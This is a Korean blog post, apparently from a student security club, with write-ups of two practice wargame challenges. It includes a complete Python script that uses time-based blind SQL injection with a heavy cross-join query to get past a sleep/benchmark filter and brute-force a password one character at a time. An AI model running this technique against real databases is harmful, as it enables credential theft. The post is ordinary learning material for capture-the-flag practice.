먼저 4번 write up 이다. 다음과 같은 쿼리를 통해서 pw를 맞추어야 하는 것 같다.
Error based 라는 점을 알아내서 비밀번호 길이를 얻어냈다. 비밀번호는 13자이다. 이를 이용해서 password를 전부 때려 맞추겠다.
password를 알아냈다.
일단은 이게 맞는지는 모르겠지만 풀었다고 하니 맞는 것 같다.
3번 write up 이다.
몇가지 테스트 결과 benchmark , sleep, #이 막혀있다는 것을 알 수 있었다. 그런데 #은 --으로도 대체가 가능하니까 상관없는데 문제는 sleep 계열이다. 다 막혀서 heavy query를 사용해주기로 했다.
이렇게 pw길이는 12라는 것을 알아냈고 브루트포싱 하면 된다.
아래코드를 작성했다. timeout 을 이용해서 진행하였다. 저 쿼리는 상당한 시간이 걸리기때문에..
#!/usr/bin/python
#-*-coding:utf-8 -*-
import urllib,urllib2,requests
import time
password=''
whole_time=0
url="http://sfwebstudy.ml/sfw3/sfw3.php?pw=%27%20or%20if("
def my_get(url) :
try :
request=requests.get(url,timeout=2)
return request.text
except requests.exceptions.Timeout :
return 'Timeout'
for i in range(1,13) :
for j in range(0x20,0xff) :
final_url=url+'ascii(substr(pw,'+str(i)+',1))='+str(j)+',(SELECT%20count(*)%20FROM%20information_schema.columns%20B,%20information_schema.columns%20A),0)%20%26%26%20%271%27=%271'
request=my_get(final_url)
if 'Timeout'==request :
password+=chr(j)
break
print(password)
분명히 이게 맞는데. solved 가 뜨지 않는다. 서버 문제인듯;...
'전공쪽 > 동아리 관련' 카테고리의 다른 글
| xss challenges (0) | 2021.01.07 |
|---|---|
| sfw6 up (0) | 2021.01.07 |
| xss game level 1~6 (0) | 2020.12.29 |
| atoi 함수 우회 가능 문자 (0) | 2020.11.30 |
| 앞으로 스스로 공부할 것 (1) | 2020.10.24 |
